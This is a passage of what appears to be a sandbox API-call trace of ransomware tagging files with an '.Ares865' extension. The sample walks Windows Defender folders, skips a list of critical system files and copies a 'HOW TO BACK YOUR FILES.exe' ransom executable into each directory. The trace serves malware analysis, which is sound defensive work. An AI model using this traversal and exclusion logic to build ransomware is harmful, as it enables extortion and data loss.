(lpString1="History.Log.Ares865", lpString2="temp") returned -1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="pagefile.sys") returned -1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="boot") returned 1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="ids.txt") returned -1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="ntuser.dat") returned -1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="perflogs") returned -1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="MSBuild") returned -1 [0090.177] lstrlenW (lpString="History.Log.Ares865") returned 19 [0090.177] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned 86 [0090.177] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="History.Log.Ares865" | out: lpString1="History.Log.Ares865") returned="History.Log.Ares865" [0090.177] lstrlenW (lpString="History.Log.Ares865") returned 19 [0090.177] lstrlenW (lpString="Ares865") returned 7 [0090.177] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.177] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.177] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.177] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xadeed740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xadeed740, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1d90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Unknown.Log.Ares865", cAlternateFileName="UNKNOW~1.ARE")) returned 1 [0090.177] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="aoldtz.exe") returned 1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2=".") returned 1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="..") returned 1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="windows") returned -1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="bootmgr") returned 1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="temp") returned 1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="pagefile.sys") returned 1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="boot") returned 1 [0090.179] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="ids.txt") returned 1 [0090.180] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="ntuser.dat") returned 1 [0090.180] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="perflogs") returned 1 [0090.180] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="MSBuild") returned 1 [0090.180] lstrlenW (lpString="Unknown.Log.Ares865") returned 19 [0090.180] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.Ares865") returned 104 [0090.180] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="Unknown.Log.Ares865" | out: lpString1="Unknown.Log.Ares865") returned="Unknown.Log.Ares865" [0090.181] lstrlenW (lpString="Unknown.Log.Ares865") returned 19 [0090.181] lstrlenW (lpString="Ares865") returned 7 [0090.181] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.181] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xadeed740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xadeed740, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1d90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Unknown.Log.Ares865", cAlternateFileName="UNKNOW~1.ARE")) returned 0 [0090.181] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.181] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0090.181] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0090.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0090.181] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 84 [0090.181] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0090.181] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.181] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\scans\\history\\results\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.182] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.182] GetLastError () returned 0x0 [0090.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.182] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.182] CloseHandle (hObject=0x120) returned 1 [0090.182] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.182] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.182] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.182] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.182] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.182] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.182] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.182] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.182] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.182] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.182] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.182] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.182] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.182] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="aoldtz.exe") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2=".") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="..") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="windows") returned -1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="bootmgr") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="temp") returned -1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="pagefile.sys") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="boot") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="ids.txt") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="ntuser.dat") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="perflogs") returned 1 [0090.183] lstrcmpiW (lpString1="Resource", lpString2="MSBuild") returned 1 [0090.183] lstrlenW (lpString="Resource") returned 8 [0090.183] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*") returned 86 [0090.183] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="Resource" | out: lpString1="Resource") returned="Resource" [0090.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0090.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2cfda8 [0090.183] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0090.183] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 0 [0090.183] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.183] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0090.183] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" [0090.183] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0090.183] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0090.183] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned 93 [0090.183] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" [0090.183] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.183] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\scans\\history\\results\\resource\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.184] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.184] GetLastError () returned 0x0 [0090.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.184] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.184] CloseHandle (hObject=0x120) returned 1 [0090.184] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.184] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.184] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.184] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.184] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.184] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.185] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.185] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.185] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.185] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.185] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.185] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.185] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.185] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80be8ad0, ftCreationTime.dwHighDateTime=0x1d33740, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", cAlternateFileName="{1D1DB~1.ARE")) returned 1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="aoldtz.exe") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2=".") returned 1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="..") returned 1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="windows") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="bootmgr") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="temp") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="pagefile.sys") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="boot") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="ids.txt") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="ntuser.dat") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="perflogs") returned -1 [0090.185] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="MSBuild") returned -1 [0090.185] lstrlenW (lpString="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865") returned 46 [0090.185] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*") returned 95 [0090.185] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865" | out: lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865") returned="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865" [0090.185] lstrlenW (lpString="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865") returned 46 [0090.185] lstrlenW (lpString="Ares865") returned 7 [0090.185] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.185] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80be8ad0, ftCreationTime.dwHighDateTime=0x1d33740, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", cAlternateFileName="{1D1DB~1.ARE")) returned 0 [0090.185] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.185] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0090.185] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0090.185] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0090.185] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0090.185] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 89 [0090.185] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0090.186] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.186] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\scans\\history\\cachemanager\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.186] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.186] GetLastError () returned 0x0 [0090.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.186] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.186] CloseHandle (hObject=0x120) returned 1 [0090.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.187] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.187] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.187] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.187] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.187] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.187] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.187] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.187] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.187] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.187] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.187] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4b8ca0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4b8ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK 